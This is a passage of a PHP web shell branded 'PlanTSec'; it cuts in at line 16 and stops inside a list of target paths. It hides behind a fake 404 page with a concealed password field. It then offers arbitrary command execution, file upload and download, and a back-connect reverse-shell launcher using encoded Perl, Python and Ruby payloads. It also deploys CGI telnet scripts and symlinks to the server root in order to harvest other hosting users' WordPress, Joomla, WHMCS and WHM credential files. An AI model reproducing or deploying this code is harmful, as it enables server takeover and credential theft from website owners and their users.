16define("404", "Options Indexes FollowSymLinks \n DirectoryIndex con7ext.htm \n AddType text/plain .php \n AddHandler text/plain .php \n Satisfy Any \n IndexOptions +Charset=UTF-8 +FancyIndexing +IgnoreCase +FoldersFirst +XHTML +HTMLTable +SuppressRules +SuppressDescription +NameWidth=* \n IndexIgnore *.txt404 \n RewriteEngine On \n RewriteCond %{REQUEST_FILENAME} ^.*con7ext_sym404 [NC] \n RewriteRule \.txt$ %{REQUEST_URI}404 [L,R=302.NC]");
17define("4042", "Options Indexes FollowSymLinks\n DirectoryIndex con7ext.htm\n HeaderName con7ext.txt\n Satisfy Any\n IndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble\n IndexIgnore *");
18define("GREB", "Options all\nRequire None\nSatisfy Any");
19function ntodLogin(){
20?>
21<HTML>
22 <HEAD>
23 <TITLE>Not Found</TITLE>
24 </HEAD>
25 <BODY>
26 <h2>Not Found</h2>
27 <hr><p>HTTP Error 404. The requested resource is not found.</p>
28 <form method="POST">
29 <input type="password" name="pass" style="display:none;">
30 </form>
31 </BODY>
32</HTML>
33<?php
34exit;
35}
36if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
37 if( empty($pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $pass) ) )
38 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
39 else
40 ntodLogin();
41if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['action'] == 'download')) {
42 @ob_clean();
43 $file = $_GET['file'];
44 header('Content-Description: File Transfer');
45 header('Content-Type: application/octet-stream');
46 header('Content-Disposition: attachment; filename="'.basename($file).'"');
47 header('Expires: 0');
48 header('Cache-Control: must-revalidate');
49 header('Pragma: public');
50 header('Content-Length: ' . filesize($file));
51 readfile($file);
52 exit;
53}
54?>
55<html>
56 <head>
57 <title>PlanTSec</title>
58 <meta charset="UTF-8">
59 <style type="text/css">
60 @import url(https://fonts.googleapis.com/css?family=Gugi);
61 body{
62 background: #707B7C;
63 color: #5DADE2;
64 font-family: 'Gugi';
65 font-size: 14px;
66 overflow-x: hidden;
67 }
68 #nav{
69 position:fixed;
70 /*z-index:999;*/
71 top:0;
72 width:auto;
73 left:66%;
74 }
75 a.nav-fokus {
76 display:block;
77 width:auto;
78 height:auto;
79 background:#191919;
80 border-top: 0px;
81 border-left: 1px solid #b3eeff;
82 border-right: 1px solid #b3eeff;
83 border-bottom: 1px solid #b3eeff;
84 padding:5px 8px;
85 text-align:center;
86 text-decoration:none;
87 color: #b3eeff;
88 line-height:20px;
89 overflow:hidden;
90 float:left;
91
92 }
93 a.nav-fokus:hover {
94 color:#FFFFFF;
95 background:#191919;
96 border-top: 0px;
97 border-left: 1px solid #fff;
98 border-right:1px solid #fff;
99 border-bottom:1px solid #fff;
100 }
101 textarea{
102 margin: auto;
103 width: 100%;
104 height: 200px;
105 transition: .3s;
106 background: transparent;
107 }
108 a {
109 color: #5DADE2;
110 text-decoration: none;
111 }
112 a:hover {
113 color: #5DADE2;
114 text-decoration: underline;
115 }
116 table{
117 background: transparent;
118 font-size: 14px;
119 font-family: 'Gugi';
120 width: 100%;
121 }
122 .th_class{
123 background: #000;
124 }
125 .td_class{
126 background: #000;
127 }
128 tr,td,th{
129 padding: 10px;
130 margin: auto;
131 border: 1px solid #000;
132 font-size: 14px;
133 height: 15px;
134 line-height: 1px;
135 }
136 table td:hover{
137 cursor:pointer;
138 background-color: #566573;
139 }
140 .toed{
141 background-image: url(http://plantsec.me/plantsec2.png);
142 background-image: linear-gradient(to bottom, rgba(0,0,0,0.6) 0%,rgba(0,0,0,0.6) 100%), url(http://plantsec.me/plantsec2.png);
143 background-repeat: no-repeat;
144 background-size: 100% 200px;
145 height: 200px;
146 font-family: 'Gugi';
147 font-size: 14px;
148 color: #F1C40F;
149 /*width: 100%;*/
150 margin-top: 50px auto;
151 border: 1px solid #000;
152 transition: 1s;
153 }
154 select{
155 background: transparent;
156 color: #000;
157 border: 1px solid #000;
158 margin: 5px auto;
159 padding-left: 5px;
160 height: 22px;
161 font-family: 'Gugi';
162 font-size: 14px;
163 }
164 input[type=text], input[type=submit]{
165 background: transparent;
166 color: #000;
167 border: 1px solid #000;
168 margin: 5px auto;
169 padding-left: 5px;
170 font-family: 'Gugi';
171 font-size: 14px;
172 }
173 textarea{
174 margin: auto;
175 width: 100%;
176 height: 400px;
177 font-family: 'Gugi';
178 font-size: 14px;
179 transition: .3s;
180 background: transparent;
181 }
182 </style>
183 </head>
184 <body>
185 <?php
186 function getStr($string, $start, $end){
187 $str = explode($start, $string);
188 $str = explode($end, $str[1]);
189 return $str[0];
190 }
191 function execute($cmd){
192 if(is_callable('system')) {
193 @ob_start();
194 @system($cmd);
195 $ntod = @ob_get_contents();
196 @ob_end_clean();
197 return $ntod;
198 }
199 elseif(is_callable('exec')){
200 @exec($cmd, $rest);
201 foreach($rest as $result){
202 $ntod .= $result;
203 }
204 return $ntod;
205 }
206 elseif(is_callable('passthru')){
207 @ob_start();
208 @passthru($cmd);
209 $ntod = @ob_get_contents();
210 @ob_end_clean();
211 return $ntod;
212 }
213 elseif(is_callable('shell_exec')){
214 $ntod = shell_exec($cmd);
215 return $ntod;
216 }
217 elseif(is_callable('proc_open')){
218 $ntod = array(
219 0 => array("pipe", "r"),
220 1 => array("pipe", "w"),
221 2 => array("pipe", "w")
222 );
223 $ntodProc = @proc_open($cmd, $ntod, $pipe, getcwd(), array());
224 if(is_resource($ntodProc)){
225 while($ntodS = fgets($pipe[1])){
226 if(!empty($ntodS)){
227 $ntoy .= $ntodS;
228 }
229 }
230 while($ntodY = fgets($pipe[2])){
231 if(!empty($ntodY)){
232 $ntoy .= $ntodY;
233 }
234 }
235 }
236 @proc_close($ntodProc);
237 if(!empty($ntoy)){
238 return $ntoy;
239 }
240 }
241 elseif(is_callable('popen')){
242 $ntod = @popen($cmd, 'r');
243 if($ntod){
244 while(!feof($ntod)){
245 $ntoy .= fread($ntod, 2096);
246 }
247 pclose($ntod);
248 }
249 if(!empty($ntoy)){
250 return $ntoy;
251 }
252 }
253 }
254 function writAble($dir, $perm){
255 if(!is_writable($dir)){
256 return "<font color=\"#C0392B\">".$perm."</font>";
257 }
258 else{
259 return "<font color=\"#1D8348\">".$perm."</font>";
260 }
261 }
262 function readAble($dir, $perm){
263 if(!is_readable($dir)){
264 return "<font color=\"#C0392B\">".$perm."</font>";
265 }
266 else{
267 return "<font color=\"#1D8348\">".$perm."</font>";
268 }
269 }
270 function getBwah($url, $type){
271 $urlArr = array();
272 $ch = curl_init();
273 curl_setopt($ch, CURLOPT_URL, $url);
274 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
275 $result = curl_exec($ch);
276 preg_match_all("|<a.*?href=\"(.*?)\"|", $result, $rw);
277 $lk = $rw[1];
278 foreach($lk as $lnk){
279 array_push($urlArr, $lnk);
280 }
281 curl_close($ch);
282 foreach($urlArr as $val){
283 $mes = "$url$val";
284 if(preg_match("#$type#is", $mes)){
285 echo $mes."\r\n";
286 }
287 }
288 }
289 function cookieRequest($url){
290 $options = array(
291 CURLOPT_RETURNTRANSFER => true,
292 CURLOPT_FOLLOWLOCATION => true,
293 CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0",
294 CURLOPT_CONNECTTIMEOUT => 5,
295 CURLOPT_SSL_VERIFYPEER => false,
296 CURLOPT_SSL_VERIFYHOST => false,
297 CURLOPT_COOKIEJAR => "cookie.txt",
298 CURLOPT_COOKIEFILE => "cookie.txt",
299 CURLOPT_COOKIESESSION => true
300 );
301 $ch = curl_init($url);
302 curl_setopt_array($ch, $options);
303 $data = curl_exec($ch);
304 return $data;
305 }
306 function makeRequest($url, $post = null, $head = null){
307 $options = array(
308 CURLOPT_URL => $url,
309 CURLOPT_CONNECTTIMEOUT => 15,
310 CURLOPT_RETURNTRANSFER => true,
311 CURLOPT_FOLLOWLOCATION => true,
312 CURLOPT_SSL_VERIFYHOST => false,
313 CURLOPT_SSL_VERIFYPEER => false,
314 CURLOPT_MAXREDIRS => 10
315 );
316 $ch = curl_init();
317 curl_setopt_array($ch, $options);
318 if($post && !empty($post)){
319 curl_setopt($ch, CURLOPT_POST, true);
320 curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
321 }
322 if($head && !empty($head)){
323 curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
324 }
325 $outputs = curl_exec($ch);
326 curl_close($ch);
327 return($outputs);
328 }
329 function perms($file){
330 $perms = fileperms($file);
331 if (($perms & 0xC000) == 0xC000) {
332 // Socket
333 $info = 's';
334 } elseif (($perms & 0xA000) == 0xA000) {
335 // Symbolic Link
336 $info = 'l';
337 } elseif (($perms & 0x8000) == 0x8000) {
338 // Regular
339 $info = '-';
340 } elseif (($perms & 0x6000) == 0x6000) {
341 // Block special
342 $info = 'b';
343 } elseif (($perms & 0x4000) == 0x4000) {
344 // Directory
345 $info = 'd';
346 } elseif (($perms & 0x2000) == 0x2000) {
347 // Character special
348 $info = 'c';
349 } elseif (($perms & 0x1000) == 0x1000) {
350 // FIFO pipe
351 $info = 'p';
352 } else {
353 // Unknown
354 $info = 'u';
355 }
356 // Owner
357 $info .= (($perms & 0x0100) ? 'r' : '-');
358 $info .= (($perms & 0x0080) ? 'w' : '-');
359 $info .= (($perms & 0x0040) ?
360 (($perms & 0x0800) ? 's' : 'x' ) :
361 (($perms & 0x0800) ? 'S' : '-'));
362 // Group
363 $info .= (($perms & 0x0020) ? 'r' : '-');
364 $info .= (($perms & 0x0010) ? 'w' : '-');
365 $info .= (($perms & 0x0008) ?
366 (($perms & 0x0400) ? 's' : 'x' ) :
367 (($perms & 0x0400) ? 'S' : '-'));
368 // World
369 $info .= (($perms & 0x0004) ? 'r' : '-');
370 $info .= (($perms & 0x0002) ? 'w' : '-');
371 $info .= (($perms & 0x0001) ?
372 (($perms & 0x0200) ? 't' : 'x' ) :
373 (($perms & 0x0200) ? 'T' : '-'));
374 return $info;
375 }
376 function hdd($s) {
377 if($s >= 1073741824)
378 return sprintf('%1.2f',$s / 1073741824 ).' GB';
379 elseif($s >= 1048576)
380 return sprintf('%1.2f',$s / 1048576 ) .' MB';
381 elseif($s >= 1024)
382 return sprintf('%1.2f',$s / 1024 ) .' KB';
383 else
384 return $s .' B';
385 }
386 if(isset($_GET['dir'])) {
387 $dir = $_GET['dir'];
388 chdir($dir);
389 } else {
390 $dir = getcwd();
391 }
392 if(!function_exists('posix_getegid')) {
393 $user = @get_current_user();
394 $uid = @getmyuid();
395 $gid = @getmygid();
396 $group = "?";
397 } else {
398 $uid = @posix_getpwuid(posix_geteuid());
399 $gid = @posix_getgrgid(posix_getegid());
400 $user = $uid['name'];
401 $uid = $uid['uid'];
402 $group = $gid['name'];
403 $gid = $gid['gid'];
404 }
405 $mpss = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
406 $freespace = hdd(disk_free_space("/"));
407 $total = hdd(disk_total_space("/"));
408 $used = $total - $freespace;
409 $ip = gethostbyname($_SERVER['HTTP_HOST']);
410 $safe = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=\"#C0392B\">ON</font>" : "<font color=\"#1D8348\">OFF</font>";
411 $mysql = (is_callable("mysql_connect")) ? "<font color=\"#1D8348\">ON</font>" : "<font color=\"#C0392B\">OFF</font>";
412 $curl = (is_callable("curl_version")) ? "<font color=\"#1D8348\">ON</font>" : "<font color=\"#C0392B\">OFF</font>";
413 $wget = (execute('wget --help')) ? "<font color=\"#1D8348\">ON</font>" : "<font color=\"#C0392B\">OFF</font>";
414 $perl = (execute('perl --help')) ? "<font color=\"#1D8348\">ON</font>" : "<font color=\"#C0392B\">OFF</font>";
415 $python = (execute('python --help')) ? "<font color=\"#1D8348\">ON</font>" : "<font color=\"#C0392B\">OFF</font>";
416 $ruby = (execute('ruby --help')) ? "<font color=\"#1D8348\">ON</font>" : "<font color=\"#C0392B\">OFF</font>";
417 $gcc = (execute('gcc --help')) ? "<font color=\"#1D8348\">ON</font>" : "<font color=\"#C0392B\">OFF</font>";
418 $dis = @ini_get("disable_functions");
419 $dfunc = (!empty($dis)) ? "<br><font color=\"#C0392B\">$dis</font>" : "<font color=\"#1D8348\">OFF</font>";
420 $dir = str_replace("\\","/",$dir);
421 $scdir = explode("/", $dir);
422 $namedc = (is_readable("/etc/named.conf")) ? "<font color=\"#1D8348\">OK</font>" : "<font color=\"#C0392B\">BAD</font>";
423 $etcPass = (is_readable("/etc/passwd")) ? "<font color=\"#1D8348\">OK</font>" : "<font color=\"#C0392B\">BAD</font>";
424 $valiases = (is_readable("/etc/valiases")) ? "<font color=\"#1D8348\">OK</font>" : "<font color=\"#C0392B\">BAD</font>";
425 $varNamed = (is_readable("/var/named")) ? "<font color=\"#1D8348\">OK</font>" : "<font color=\"#C0392B\">BAD</font>";
426 echo "<div class=\"toed\">";
427 echo "
428 <div id=\"nav\">
429 <a class=\"nav-fokus\" href=\"?\"><b>Home</b></a>
430 <a class=\"nav-fokus\" href=\"?dir=$dir&ntod=upload\">Upload</a>
431 <a class=\"nav-fokus\" href=\"?dir=$dir&ntod=cmd\">Command</a>
432 <a class=\"nav-fokus\" href=\"?dir=$dir&ntod=backconnect\">Network</a>
433 <a class=\"nav-fokus\" href=\"?dir=$dir&ntod=cgi_\">CGI</a>
434 <a class=\"nav-fokus\" href=\"?dir=$dir&ntod=ngonpig\">Conf</a>
435 <a class=\"nav-fokus\" href=\"?ntod=kill\">Kill</a>
436 <a class=\"nav-fokus\" href=\"?logout=true\">Logout</a>
437 </div>";
438 echo "System : <font color=\"#5DADE2\">".php_uname()."</font><br>";
439 echo "User : <font color=\"#5DADE2\">$user</font> ($uid) Group: <font color=\"#5DADE2\">$group</font> ($gid)<br>";
440 echo "IP : <font color=\"#5DADE2\">$ip</font> (Server) | <font color=\"#5DADE2\">".$_SERVER['REMOTE_ADDR']."</font> (You)<br>";
441 echo "HDD : <font color=\"#5DADE2\">$used</font> (USED) / <font color=\"#5DADE2\">$total</font> (TOTAL) / <font color=\"#5DADE2\">$freespace</font> (FREE)<br>";
442 echo "Safe : $safe<br>";
443 echo "MySql ($mysql) cURL ($curl) wGet ($wget) Perl ($perl) Python ($python) Ruby ($ruby) Gcc ($gcc)<br>";
444 echo "Named.Conf ($namedc) Passwd ($etcPass) Valiases ($valiases) Named ($varNamed)<br>";
445 echo "Is Cpanel ()";
446 echo "Disable Function : $dfunc<br>";
447 echo "DIR : <font color=\"#5DADE2\">";
448 foreach($scdir as $c_dir => $cdir){
449 echo "<a href=\"?dir=/";
450 for($i = 0; $i <= $c_dir; $i++){
451 echo $scdir[$i];
452 if($i != $sc_dir){
453 echo "/";
454 }
455 }
456 echo "\">$cdir</a>/</font>";
457 }
458 echo "<br>
459 <a href=\"?dir=$dir&ntod=adminer\">Adminer</a> |
460 <a href=\"?dir=$dir&ntod=cpreset\">Cpanel Reset</a> |
461 <a href=\"?dir=$dir&ntod=titleChange\">Wordpress Title Changer</a>";
462 echo "</div>";
463 $nTod = $_GET['ntod'];
464 if($_GET['logout'] == true){
465 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
466 echo "<script>alert(\"Thanks for using my shell :D\");</script>";
467 }
468 elseif($nTod == "upload"){
469 echo "<center><form method=\"POST\" enctype=\"multipart/form-data\">
470 <input type=\"file\" name=\"fils\">
471 <input type=\"submit\" name=\"upl\" value=\"Upload!\">
472 </form>";
473 if($_POST["upl"]){
474 if(@copy($_FILES["fils"]["tmp_name"], "$dir/".$_FILES["fils"]["name"]."")){
475 echo "<font color=\"#1D8348\">Success Upload</font> at <b>$dir/".$_FILES["fils"]["name"]."</b>";
476 }
477 else{
478 echo "<font color=\"#C0392B\">Could not upload file</font>";
479 }
480 }
481 echo "</center>";
482 }
483 elseif($nTod == "cmd"){
484 echo "
485 <form method=\"POST\">
486 <input type=\"text\" name=\"cmd\" required>
487 <input type=\"submit\" name=\"subm\" value=\"Exe\">
488 </form>";
489 if($_POST["subm"]){
490 $mahx = execute($_POST["cmd"]);
491 if($mahx){
492 echo "<pre>$mahx</pre>";
493 }
494 }
495 }
496 elseif($nTod == "kill"){
497 if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))){
498 echo "<center><br><h2><b>Shell Removed</b><br>Good bye, Thanks for take my shell today :D<h2></center>";
499 }
500 else{
501 echo "<center>Oppshi!!! I can't kill my self :|</center>";
502 }
503 }
504 elseif($nTod == "backconnect"){
505 echo "
506 <br><center><form method=\"POST\">
507 <h1>Back-Connect</h1><br>
508 Server: <input type=\"text\" name=\"server\" placaeholder=\"".$_SERVER['REMOTE_ADDR']."\"> Port <input type=\"text\" name=\"port\" placeholder=\"2234\">
509 <select name=\"ntodBc\">
510 <option value=\"perl\">PERL</option>
511 <option value=\"python\">Python</option>
512 <option value=\"ruby\">Ruby</option>
513 </select>
514 <input type=\"submit\" name=\"subm\" value=\"BC!!!\"><br/>";
515 if($_POST["subm"]){
516 if($_POST["ntodBc"] == "perl"){
517 $fp = fopen("bc.pl", "w");
518 if(fwrite($fp, base64_decode(PERL_BC))){
519 $res = execute("perl bc.pl ".$_POST["server"]." ".$_POST["port"]." 1>/dev/null 2>&1 &");
520 echo $res . "<pre>".execute("ps aux | grep bc.pl")."</pre>";
521 }
522 else{
523 echo "I can't create a back connect file :|";
524 }
525 fclose($fp);
526 unlink("bc.pl");
527 }
528 elseif($_POST["ntodBc"] == "python"){
529 $fp = fopen("bc.py", "w");
530 if(fwrite($fp, base64_decode(PYTHON_BC))){
531 $res = execute("perl bc.py ".$_POST["server"]." ".$_POST["port"]." 1>/dev/null 2>&1 &");
532 echo $res . "<pre>".execute("ps aux | grep bc.py")."</pre>";
533 }
534 else{
535 echo "I can't create a back connect file :|";
536 }
537 fclose($fp);
538 unlink("bc.py");
539 }
540 elseif($_POST["ntodBc"] == "ruby"){
541 $fp = fopen("bc.rb", "w");
542 if(fwrite($fp, base64_decode(RUBY_BC))){
543 $res = execute("perl bc.rb ".$_POST["server"]." ".$_POST["port"]." 1>/dev/null 2>&1 &");
544 echo $res . "<pre>".execute("ps aux | grep bc.rb")."</pre>";
545 }
546 else{
547 echo "I can't create a back connect file :|";
548 }
549 fclose($fp);
550 unlink("bc.rb");
551 }
552 }
553 echo "</center>";
554 }
555 elseif($nTod == "cgi_"){
556 echo "<br><br><center><b><h1>Cgi _ Telnet</h1><br><a href=\"?dir=$dir&ntod=cgi\">CGI</a> | <a href=\"?dir=$dir&ntod=cgi2\">CGI 2</a></b></center>";
557 }
558 elseif($nTod == "cgi"){
559 @mkdir('con7ext_', 0755);
560 @chdir('con7ext_');
561 $fp = fopen(".htaccess", "w");
562 $fpcgi = fopen("cgi.con7ext", "w");
563 fwrite($fp, HTACCESS);
564 fwrite($fpcgi, base64_decode(CGI_1));
565 @chmod("cgi.con7ext", 0755);
566 @chmod(".htaccess", 0755);
567 echo "<br><center>--><a href=\"$mpss/con7ext_/cgi.con7ext\">Done Klik Here</a><--<br/><iframe src=\"$mpss/con7ext_/cgi.con7ext\" style=\"width: 100%; height: 500px\"></center>";
568 }
569 elseif($nTod == "cgi2"){
570 @mkdir('con7ext_', 0755);
571 @chdir('con7ext_');
572 $fp = fopen(".htaccess", "w");
573 $fpcgi = fopen("cgi2.con7ext", "w");
574 fwrite($fp, HTACCESS);
575 fwrite($fpcgi, base64_decode(CGI_2));
576 @chmod("cgi2.con7ext", 0755);
577 @chmod(".htaccess", 0755);
578 echo "<br><center>--><a href=\"$mpss/con7ext_/cgi2.con7ext\">Done Klik Here</a><--<br/><iframe src=\"$mpss/con7ext_/cgi2.con7ext\" style=\"width: 100%; height: 500px\"></center>";
579 }
580 elseif($nTod == "ngonpig"){
581 if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
582 echo "<script>alert(\"Sorry, This function not working in windows server\");</script>";
583 exit;
584 }
585 if($_POST["subm"]){
586 if($_POST["conf"] == "vhosts"){
587 @mkdir("con7ext_conf/vhosts", 0777, true);
588 @execute("ln -s / con7ext_conf/vhosts/root");
589 @file_put_contents("con7ext_conf/vhosts/.htaccess", SYM);
590 $passwd = $_POST["pws"];
591 $passwd = explode("\n", $passwd);
592 foreach($passwd as $ikuzo){
593 $nto = explode(":", $ikuzo);
594 $user = $nto[5];
595 $mpsh = preg_replace('/\/var\/www\/vhosts\//', '', $user);
596 if(preg_match('/vhosts/i', $user)){
597 execute("ln -s ".$user."/httpdocs/wp-config.php con7ext_symvhosts/".$mpsh."-Wordpress.txt");
598 execute("ln -s ".$user."/httpdocs/configuration.php con7ext_symvhosts/".$mpsh."-Joomla.txt");
599 execute("ln -s ".$user."/httpdocs/config/koneksi.php con7ext_symvhosts/".$mpsh."-Lokomedia.txt");
600 execute("ln -s ".$user."/httpdocs/forum/config.php con7ext_symvhosts/".$mpsh."-phpBB.txt");
601 execute("ln -s ".$user."/httpdocs/sites/default/settings.php con7ext_symvhosts/".$mpsh."-Drupal.txt");
602 execute("ln -s ".$user."/httpdocs/config/settings.inc.php con7ext_symvhosts/".$mpsh."-PrestaShop.txt");
603 execute("ln -s ".$user."/httpdocs/app/etc/local.xml con7ext_symvhosts/".$mpsh."-Magento.txt");
604 execute("ln -s ".$user."/httpdocs/admin/config.php con7ext_symvhosts/".$mpsh."-OpenCart.txt");
605 execute("ln -s ".$user."/httpdocs/application/config/database.php con7ext_symvhosts/".$mpsh."-Ellislab.txt");
606 }
607 }
608 echo "<center><a href=\"con7ext_conf/vhosts\" target=\"_blank\">Vhosts</a></center>";
609 }
610 elseif($_POST["conf"] == "sym"){
611 @mkdir("con7ext_conf/sym", 0755, true);
612 @symlink("/", "con7ext_conf/sym/root");
613 @file_put_contents("con7ext_conf/sym/.htaccess", SYM);
614 echo "<center><a href=\"con7ext_conf/sym\" target=\"_blank\">SymConf</a></center>";
615 }
616 elseif($_POST["conf"] == "404"){
617 @mkdir("con7ext_conf/404", 0755, true);
618 @symlink("/", "con7ext_conf/404/root");
619 @file_put_contents("con7ext_conf/404/.htaccess", 404);
620 echo "<center><a href=\"con7ext_conf/404\" target=\"_blank\">404</a></center>";
621 }
622 elseif($_POST["conf"] == "grab"){
623 @mkdir("con7ext_conf/grab", 0755, true);
624 $fp = @fopen("con7ext_conf/grab/.htaccess", "w");
625 fwrite($fp, GREB);
626 echo "<center><a href=\"con7ext_conf/grab\" target=\"_blank\">Grabber</a></center>";
627 }
628 $passwd = $_POST["pws"];
629 preg_match_all('/(.*?):x:/', $passwd, $conf);
630 foreach($conf[1] as $meh){
631 $mah = array(
632 "/home/$meh/.accesshash" => "WHM-accesshash",
633 "/home/$meh/public_html/config/koneksi.php" => "Lokomedia",
634 "/home/$meh/public_html/forum/config.php" => "phpBB",
635 "/home/$meh/public_html/sites/default/settings.php" => "Drupal",
636 "/home/$meh/public_html/config/settings.inc.php" => "PrestaShop",
637 "/home/$meh/public_html/app/etc/local.xml" => "Magento",
638 "/home/$meh/public_html/admin/config.php" => "OpenCart",
639 "/home/$meh/public_html/application/config/database.php" => "Ellislab",
640 "/home/$meh/public_html/vb/includes/config.php" => "Vbulletin",
641 "/home/$meh/public_html/includes/config.php" => "Vbulletin",
642 "/home/$meh/public_html/forum/includes/config.php" => "Vbulletin",
643 "/home/$meh/public_html/forums/includes/config.php" => "Vbulletin",
644 "/home/$meh/public_html/cc/includes/config.php" => "Vbulletin",
645 "/home/$meh/public_html/inc/config.php" => "MyBB",
646 "/home/$meh/public_html/includes/configure.php" => "OsCommerce",
647 "/home/$meh/public_html/shop/includes/configure.php" => "OsCommerce",
648 "/home/$meh/public_html/os/includes/configure.php" => "OsCommerce",
649 "/home/$meh/public_html/oscom/includes/configure.php" => "OsCommerce",
650 "/home/$meh/public_html/products/includes/configure.php" => "OsCommerce",
651 "/home/$meh/public_html/cart/includes/configure.php" => "OsCommerce",
652 "/home/$meh/public_html/inc/conf_global.php" => "IPB",
653 "/home/$meh/public_html/wp-config.php" => "Wordpress",
654 "/home/$meh/public_html/wp/test/wp-config.php" => "Wordpress",
655 "/home/$meh/public_html/blog/wp-config.php" => "Wordpress",
656 "/home/$meh/public_html/beta/wp-config.php" => "Wordpress",
657 "/home/$meh/public_html/portal/wp-config.php" => "Wordpress",
658 "/home/$meh/public_html/site/wp-config.php" => "Wordpress",
659 "/home/$meh/public_html/wp/wp-config.php" => "Wordpress",
660 "/home/$meh/public_html/WP/wp-config.php" => "Wordpress",
661 "/home/$meh/public_html/news/wp-config.php" => "Wordpress",
662 "/home/$meh/public_html/wordpress/wp-config.php" => "Wordpress",
663 "/home/$meh/public_html/test/wp-config.php" => "Wordpress",
664 "/home/$meh/public_html/demo/wp-config.php" => "Wordpress",
665 "/home/$meh/public_html/home/wp-config.php" => "Wordpress",
666 "/home/$meh/public_html/v1/wp-config.php" => "Wordpress",
667 "/home/$meh/public_html/v2/wp-config.php" => "Wordpress",
668 "/home/$meh/public_html/press/wp-config.php" => "Wordpress",
669 "/home/$meh/public_html/new/wp-config.php" => "Wordpress",
670 "/home/$meh/public_html/blogs/wp-config.php" => "Wordpress",
671 "/home/$meh/public_html/configuration.php" => "Joomla",
672 "/home/$meh/public_html/blog/configuration.php" => "Joomla",
673 "/home/$meh/public_html/submitticket.php" => "^WHMCS",
674 "/home/$meh/public_html/cms/configuration.php" => "Joomla",
675 "/home/$meh/public_html/beta/configuration.php" => "Joomla",
676 "/home/$meh/public_html/portal/configuration.php" => "Joomla",
677 "/home/$meh/public_html/site/configuration.php" => "Joomla",
678 "/home/$meh/public_html/main/configuration.php" => "Joomla",
679 "/home/$meh/public_html/home/configuration.php" => "Joomla",
680 "/home/$meh/public_html/demo/configuration.php" => "Joomla",
681 "/home/$meh/public_html/test/configuration.php" => "Joomla",
682 "/home/$meh/public_html/v1/configuration.php" => "Joomla",
683 "/home/$meh/public_html/v2/configuration.php" => "Joomla",
684 "/home/$meh/public_html/joomla/configuration.php" => "Joomla",
685 "/home/$meh/public_html/new/configuration.php" => "Joomla",
686 "/home/$meh/public_html/WHMCS/submitticket.php" => "WHMCS",
687 "/home/$meh/public_html/whmcs1/submitticket.php" => "WHMCS",
688 "/home/$meh/public_html/Whmcs/submitticket.php" => "WHMCS",
689 "/home/$meh/public_html/whmcs/submitticket.php" => "WHMCS",
690 "/home/$meh/public_html/whmcs/submitticket.php" => "WHMCS",
691 "/home/$meh/public_html/WHMC/submitticket.php" => "WHMCS",
692 "/home/$meh/public_html/Whmc/submitticket.php" => "WHMCS",
693 "/home/$meh/public_html/whmc/submitticket.php" => "WHMCS",
694 "/home/$meh/public_html/WHM/submitticket.php" => "WHMCS",
695 "/home/$meh/public_html/Whm/submitticket.php" => "WHMCS",
696 "/home/$meh/public_html/whm/submitticket.php" => "WHMCS",
697 "/home/$meh/public_html/HOST/submitticket.php" => "WHMCS",
698 "/home/$meh/public_html/Host/submitticket.php" => "WHMCS",
699 "/home/$meh/public_html/host/submitticket.php" => "WHMCS",
700 "/home/$meh/public_html/SUPPORTES/submitticket.php" => "WHMCS",
701 "/home/$meh/public_html/Supportes/submitticket.php" => "WHMCS",
702 "/home/$meh/public_html/supportes/submitticket.php" => "WHMCS",
703 "/home/$meh/public_html/domains/submitticket.php" => "WHMCS",
704 "/home/$meh/public_html/domain/submitticket.php" => "WHMCS",
705 "/home/$meh/public_html/Hosting/submitticket.php" => "WHMCS",
706 "/home/$meh/public_html/HOSTING/submitticket.php" => "WHMCS",
707 "/home/$meh/public_html/hosting/submitticket.php" => "WHMCS",
708 "/home/$meh/public_html/CART/submitticket.php" => "WHMCS",
709 "/home/$meh/public_html/Cart/submitticket.php" => "WHMCS",
710 "/home/$meh/public_html/cart/submitticket.php" => "WHMCS",
711 "/home/$meh/public_html/ORDER/submitticket.php" => "WHMCS",
712 "/home/$meh/public_html/Order/submitticket.php" => "WHMCS",
713 "/home/$meh/public_html/order/submitticket.php" => "WHMCS",
714 "/home/$meh/public_html/CLIENT/submitticket.php" => "WHMCS",
715 "/home/$meh/public_html/Client/submitticket.php" => "WHMCS",
716 "/home/$meh/public_html/client/submitticket.php" => "WHMCS",
717 "/home/$meh/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
718 "/home/$meh/public_html/Clientarea/submitticket.php" => "WHMCS",
719 "/home/$meh/public_html/clientarea/submitticket.php" => "WHMCS",
720 "/home/$meh/public_html/SUPPORT/submitticket.php" => "WHMCS",
721 "/home/$meh/public_html/Support/submitticket.php" => "WHMCS",
722 "/home/$meh/public_html/support/submitticket.php" => "WHMCS",
723 "/home/$meh/public_html/BILLING/submitticket.php" => "WHMCS",
724 "/home/$meh/public_html/Billing/submitticket.php" => "WHMCS",
725 "/home/$meh/public_html/billing/submitticket.php" => "WHMCS",
726 "/home/$meh/public_html/BUY/submitticket.php" => "WHMCS",
727 "/home/$meh/public_html/Buy/submitticket.php" => "WHMCS",
728 "/home/$meh/public_html/buy/submitticket.php" => "WHMCS",
729 "/home/$meh/public_html/MANAGE/submitticket.php" => "WHMCS",
730 "/home/$meh/public_html/Manage/submitticket.php" => "WHMCS",
731 "/home/$meh/public_html/manage/submitticket.php" => "WHMCS",
732 "/home/$meh/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
733 "/home/$meh/public_html/ClientSupport/submitticket.php" => "WHMCS",
734 "/home/$meh/public_html/Clientsupport/submitticket.php" => "WHMCS",
735 "/home/$meh/public_html/clientsupport/submitticket.php" => "WHMCS",
736 "/home/$meh/public_html/CHECKOUT/submitticket.php" => "WHMCS",
737 "/home/$meh/public_html/Checkout/submitticket.php" => "WHMCS",
738 "/home/$meh/public_html/checkout/submitticket.php" => "WHMCS",
